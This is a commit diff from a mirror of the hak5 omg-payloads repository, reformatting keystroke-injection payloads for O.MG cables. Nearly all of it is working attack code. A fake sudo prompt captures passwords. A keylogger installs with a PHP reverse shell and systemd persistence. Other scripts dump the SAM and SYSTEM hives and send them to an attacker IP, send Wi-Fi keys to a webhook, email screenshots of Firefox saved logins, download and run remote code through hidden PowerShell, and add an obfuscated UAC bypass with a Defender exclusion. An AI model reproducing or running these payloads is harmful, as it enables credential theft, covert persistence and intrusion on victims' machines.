hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixing misc execution or formatting errors 

There are many payloads in the repo that do not run due to compiler errors (mostly typos, but a few commands that do not exist on O.MG devices).

Fixing those errors, along with implementing minor changes such as using STRINGLN in place of STRING and ENTER, or DEFAULT_DELAY in place of DELAY 200 on every other line for improved readability.

No content of these scripts has been altered, and I do not intend to run them to validate that they work as intended on their target operating systems.
syntaxFixes
kalanihelekunihi 2023-06-05 12:29:42 -04:00
parent 63ce12dd61
commit 4a0fdf22c3
32 changed files with 679 additions and 1249 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
payloads/library/credentials/-OMG-Credz-Plz/Credz-Plz-Execute.txt
View File

@ -1,15 +1,18 @@
REM Title: Credz-Plz
REM_BLOCK
Title: Credz-Plz
Author: I am Jakoby
Target: Windows 10, 11
REM Author: I am Jakoby
Description: This payload is meant to prompt the target to enter their creds to later be ted with dropbox. See README.md file for more details.
REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details.
Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
REM Target: Windows 10, 11
DEFINE #URL
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://#URL?dl=1; invoke-expression $pl

186
payloads/library/credentials/Harvester_OF_SORROW/payload.txt
View File

@ -1,192 +1,92 @@
REM Title: Harvester_OF_SORROW
REM Author: LulzAnarchyAnon
REM Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a
REM pin, or password is required to export saved log in credentials.
REM The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes
REM a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot
REM to an email of your choosing.
REM Target: Windows 10, PowerShell & Mozilla Firefox
REM_BLOCK
Title: Harvester_OF_SORROW
Author: LulzAnarchyAnon
Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a pin, or password is required to export saved log in credentials.
The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.
Target: Windows 10, PowerShell & Mozilla Firefox
Props: Darren Kitchen, KARROTKAK3, I am Jakoby and the-jcksn
REM Version: 1.0
REM Category: Credentials (OMG)
Version: 1.0
Category: Credentials (OMG)
REM Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds.
REM After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from
REM the email screen shot.
Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds.
After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from the email screen shot.
You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
Can exfil more than 5, but I chose 5 to keep file sizes low.
Can exfil from directory other than screenshots by changing path.
You might have to adjust the delays, depending on the target machine, but these worked ok for me.
Use responsibly, and within the confines of the law.
END_REM
DEFINE #USER_EMAIL user@example.com
DEFINE #USER_PASSWORD supersecretpassword
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 200
GUI r
DELAY 200
STRING firefox about:logins
ENTER
STRINGLN firefox about:logins
DELAY 1000
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
TAB
REPEAT 10 TAB
DELAY 1000
SHIFT SPACE
DELAY 5000
PRINTSCREEN
DELAY 5000
GUI r
DELAY 200
STRING powershell -windowstyle hidden
ENTER
STRINGLN powershell -windowstyle hidden
DELAY 2000
STRING mspaint
ENTER
STRINGLN mspaint
DELAY 5000
CTRL v
DELAY 2000
CTRL s
TAB
DELAY 300
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 100
REPEAT 11 TAB
RIGHTARROW
DELAY 100
DOWNARROW
DELAY 100
RIGHTARROW
DELAY 100
RIGHTARROW
DELAY 200
REPEAT 2 RIGHTARROW
TAB
DELAY 200
ENTER
CTRL RIGHTARROW
DELAY 100
CTRL RIGHTARROW
DELAY 100
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
RIGHTARROW
DELAY 200
RIGHTARROW
REPEAT 2 CTRL RIGHTARROW
REPEAT 13 TAB
REPEAT 2 RIGHTARROW
ENTER
TAB
ENTER
DELAY 1000
ALT f
DELAY 50
ALT X
DELAY 50
ALT f
DELAY 50
X
DELAY 2000
REM ~~~~ You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
REM ~~~~ Can exfil more than 5, but I chose 5 to keep file sizes low.
REM ~~~~ Can exfil from directory other than screenshots by changing path on lines 18, 57, and 61.
REM ~~~~ You might have to adjust the delays, depending on the target machine, but these worked ok for me.
REM ~~~~ Use responsibly, and within the confines of the law.
DELAY 2000
GUI r
DELAY 200
REM navigating to the directory to exfil from - change the following if you do not want the latest screenshots
STRING %USERPROFILE%\Pictures\Screenshots
ENTER
DELAY 150
STRINGLN %USERPROFILE%\Pictures\Screenshots
REM sorting the files by date
MENU
DELAY 150
SHIFT F10
STRING o
DELAY 150
DOWNARROW
DELAY 150
ENTER
DELAY 150
REM selecting files to exfil, repeat this line if you want more than 5, but bear in mind this might impact some of the delays
SHIFT RIGHTARROW
SHIFT RIGHTARROW
SHIFT RIGHTARROW
SHIFT RIGHTARROW
DELAY 150
REPEAT 4 SHIFT RIGHTARROW
REM sending files to loot.zip
MENU
DELAY 150
SHIFT F10
STRING n
DELAY 200
DOWNARROW
DELAY 150
ENTER
DELAY 500
STRING loot
ENTER
DELAY 150
STRINGLN loot
ALT F4
DELAY 150
GUI r
DELAY 150
REM open powershell and send the email
STRING powershell
ENTER
STRINGLN powershell
DELAY 500
REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~
STRING Send-MailMessage -From user@example.com -To user@example.com -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList user@example.com, (ConvertTo-SecureString -String "supersecretpassword" -AsPlainText -Force))
ENTER
STRINGLN Send-MailMessage -From #USER_EMAIL -To #USER_EMAIL -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #USER_EMAIL, (ConvertTo-SecureString -String "#USER_PASSWORD" -AsPlainText -Force))
DELAY 500
REM cleanup
STRING del Pictures\Screenshots\loot.zip
ENTER
DELAY 150
STRING exit
ENTER
STRINGLN del Pictures\Screenshots\loot.zip
STRINGLN exit

84
payloads/library/credentials/OMGLogger/payload.txt
View File

@ -1,93 +1,75 @@
REM Title: DuckyLogger
REM Description: Key logger which sends each and every key stroke of target remotely/locally.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Credentials
REM Target: Unix-like operating systems with systemd
REM Attackmodes: HID
REM_BLOCK
Title: DuckyLogger
Description: Key logger which sends each and every key stroke of target remotely/locally.
AUTHOR: drapl0n
Version: 1.0
Category: Credentials
Target: Unix-like operating systems with systemd
Attackmodes: HID
REM [Note]
REM Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions.
Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions.
END_REM
DUCKY_LANG US
REM [keeping tracks clear]
DELAY 5000
CTRL ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
DELAY 100
REM [creating key logging mechanism]
STRING mkdir /var/tmp/.system
ENTER
STRINGLN mkdir /var/tmp/.system
DELAY 100
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
ENTER
STRINGLN echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
DELAY 100
STRING chmod +x /var/tmp/.system/sys
ENTER
STRINGLN chmod +x /var/tmp/.system/sys
DELAY 100
REM [importing xinput]
STRING cd /var/tmp/.system/
ENTER
STRINGLN cd /var/tmp/.system/
DELAY 100
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
ENTER
STRINGLN wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
DELAY 5000
STRING chmod +x xinput
ENTER
STRINGLN chmod +x xinput
DELAY 100
REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
STRINGLN echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
STRINGLN chmod +x /var/tmp/.system/systemBus
DELAY 100
REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user
ENTER
STRINGLN mkdir -p ~/.config/systemd/user
DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
DELAY 100
REM [creating reboot script incase if listner stops or targets internet connection gets lost]
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER
STRINGLN echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
DELAY 100
STRING chmod +x /var/tmp/.system/reboot
ENTER
STRINGLN chmod +x /var/tmp/.system/reboot
DELAY 100
REM [creating systemd service to execute payload on boot]
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
STRINGLN echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
DELAY 100
REM [enabling service]
STRING systemctl --user daemon-reload
ENTER
STRINGLN systemctl --user daemon-reload
DELAY 300
STRING systemctl --user enable --now systemBUS.service
ENTER
STRINGLN systemctl --user enable --now systemBUS.service
DELAY 150
STRING systemctl --user start --now systemBUS.service
ENTER
STRINGLN systemctl --user start --now systemBUS.service
DELAY 150
STRING systemctl --user enable --now reboot.service
ENTER
STRINGLN systemctl --user enable --now reboot.service
DELAY 150
STRING systemctl --user start --now reboot.service
ENTER
STRINGLN systemctl --user start --now reboot.service
DELAY 100
REM [autostarting service on terminal/shell launch]
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER
STRINGLN echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER
STRINGLN chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

39
payloads/library/credentials/SamDumpCable/payload.txt
View File

@ -1,33 +1,24 @@
REM Title: SamDumpCable
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
REM Author: 0iphor13
REM Version: 1.0
REM Category: Credentials
REM Requirements: OMG Firmware v.2.5 or higher
REM_BLOCK
Title: SamDumpCable
Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
Author: 0iphor13
Version: 1.0
Category: Credentials
Requirements: OMG Firmware v.2.5 or higher
END_REM
DEFINE #IPADDRESS 0.0.0.0
DELAY 1000
DUCKY_LANG de
DELAY 500
DELAY 1500
DELAY 2000
DEFAULT_DELAY 500
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
DELAY 500
ENTER
DELAY 1000
STRINGLN powershell Start-Process powershell -Verb runAs
REM Change this Change this shortcut depending on the systems language (engl.: ALT y)
ALT j
DELAY 250
STRING powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQAzADMANwBPAE0ARwBzAGEAbQA7AHIAZQBnACAAcwBhAHYAZQAgAGgAawBsAG0AXABzAHkAcwB0AGUAbQAgADEAMwAzADcATwBNAEcAcwB5AHMAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAFAAVwBEAFwAMQAzADMANwBPAE0ARwBzAHkAcwAiACwAIAAiACQAUABXAEQAXAAxADMAMwA3AE8ATQBHAHMAYQBtACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAATwBNAEcAZAB1AG0AcAAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAMQAzADMANwBPAE0ARwBzAHkAcwA7AHIAZQBtAG8AdgBlAC0AaQB0AGUAbQAgADEAMwAzADcATwBNAEcAcwBhAG0AOwBlAHgAaQB0AA==
DELAY 200
ENTER
DELAY 200
STRINGLN powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQAzADMANwBPAE0ARwBzAGEAbQA7AHIAZQBnACAAcwBhAHYAZQAgAGgAawBsAG0AXABzAHkAcwB0AGUAbQAgADEAMwAzADcATwBNAEcAcwB5AHMAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAFAAVwBEAFwAMQAzADMANwBPAE0ARwBzAHkAcwAiACwAIAAiACQAUABXAEQAXAAxADMAMwA3AE8ATQBHAHMAYQBtACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAATwBNAEcAZAB1AG0AcAAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAMQAzADMANwBPAE0ARwBzAHkAcwA7AHIAZQBtAG8AdgBlAC0AaQB0AGUAbQAgADEAMwAzADcATwBNAEcAcwBhAG0AOwBlAHgAaQB0AA==
REM Insert your recieving servers IP here ----------------------------------------------------------
STRING iwr "http://0.0.0.0" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit
DELAY 200
ENTER
STRINGLN iwr "http://#IPADDRESS" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit

97
payloads/library/credentials/SudoSnatch/payload.txt
View File

@ -1,82 +1,51 @@
REM Title: sudoSnatch
REM Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Credentials
REM Target: Unix-like operating systems with systemd
REM Attackmodes: HID
REM_BLOCK
Title: sudoSnatch
Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..
AUTHOR: drapl0n
Version: 1.0
Category: Credentials
Target: Unix-like operating systems with systemd
Attackmodes: HID
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 100
REM [keeping tracks clear]
DELAY 5000
CTRL ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100
STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
REM [creating password grabbing mechanism]
STRING mkdir /var/tmp/.system
ENTER
DELAY 100
STRING echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr
ENTER
DELAY 100
STRING touch /var/tmp/.system/sysLog
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemMgr
ENTER
DELAY 100
STRINGLN mkdir /var/tmp/.system
STRINGLN echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr
STRINGLN touch /var/tmp/.system/sysLog
STRINGLN chmod +x /var/tmp/.system/systemMgr
REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100
STRINGLN echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
STRINGLN chmod +x /var/tmp/.system/systemBus
REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user
ENTER
DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100
STRINGLN mkdir -p ~/.config/systemd/user
STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
REM [creating reboot script incase if listner stops or targets internet connection gets lost]
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/reboot
ENTER
DELAY 100
STRINGLN echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
STRINGLN chmod +x /var/tmp/.system/reboot
REM [creating systemd service for reboot]
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
DELAY 100
STRINGLN echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
REM [enabling services]
STRING systemctl --user daemon-reload
ENTER
DELAY 300
STRING systemctl --user enable --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user start --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user enable --now reboot.service
ENTER
DELAY 150
STRING systemctl --user start --now reboot.service
ENTER
DELAY 100
STRINGLN systemctl --user daemon-reload
STRINGLN systemctl --user enable --now systemBUS.service
STRINGLN systemctl --user start --now systemBUS.service
STRINGLN systemctl --user enable --now reboot.service
STRINGLN systemctl --user start --now reboot.service
REM [autostarting service on terminal/shell launch]
STRING echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER
DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER
STRINGLN echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
STRINGLN chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

43
payloads/library/credentials/wifigrabber/payload.txt
View File

@ -1,27 +1,24 @@
REM I took my own code and found the other version already made. I combined them to make it better
REM this is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino
REM this is designed for the omg cable instead of the tiny.
REM_BLOCK
DESCRIPTION:
I took my own code and found the other version already made. I combined them to make it better.
This is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino
This is designed for the omg cable instead of the tiny.
END_REM
DEFINE #WEBHOOKADDR <ADD-WEBHOOK-ADDRESS-HERE>
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
Delay 3000
STRING GUI r
Delay 100
String cmd /k mode con: cols=15 lines=1
Enter
Delay 500
String cd %temp%
Enter
Delay 500
String netsh wlan export profile key=clear
Enter
Delay 1000
String powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
Enter
STRINGLN cmd /k mode con: cols=15 lines=1
STRINGLN cd %temp%
STRINGLN netsh wlan export profile key=clear
STRINGLN powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
DELAY 3000
STRINGLN powershell Invoke-WebRequest -Uri https://webhook.site/#WEBHOOKADDR -Method POST -InFile Wi-Fi-PASS
Delay 3000
String powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS
Enter
Delay 3000
String del Wi* /s /f /q
Enter
Delay 1000
Exit
STRINGLN del Wi* /s /f /q
STRINGLN exit

16
payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute
View File

@ -1,16 +0,0 @@
REM Title: Play-WAV
REM Author: I am Jakoby
REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
REM Target: Windows 10, 11
REM Remeber to replace the link with your link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
DELAY 500
ENTER

19
payloads/library/execution/-OMG-Play-WAV/Play-WAV-Execute.txt Normal file
View File

@ -0,0 +1,19 @@
REM_BLOCK
Title: Play-WAV
Author: I am Jakoby
Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more
Target: Windows 10, 11
Remeber to replace the link with your link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -Exec Bypass iwr https://#URL?dl=1 -O $env:TMP\e.wav

31
payloads/library/execution/-OMG-SafeHaven/SafeHaven.txt
View File

@ -1,25 +1,20 @@
REM Title: Safe-Haven
REM_BLOCK
Title: Safe-Haven
Author: I am Jakoby
REM Author: I am Jakoby
Description: This is a UAC bypass payload that will open an elevated powershell console
Next a Directory called "safe" will be generated in your Documents Directory
The "safe" directory will be added to the Window's Defender Exclusion list
The AntiVirus will ignore all files downloaded to or ran from here
REM Description: This is a UAC bypass payload that will open an elevated powershell console
REM Next a Directory called "safe" will be generated in your Documents Directory
REM The "safe" directory will be added to the Window's Defender Exclusion list
REM The AntiVirus will ignore all files downloaded to or ran from here
Target: Windows 10, 11
END_REM
REM Target: Windows 10, 11
DUCKY_LANG US
DELAY 2000
DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 1000
STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )
ENTER
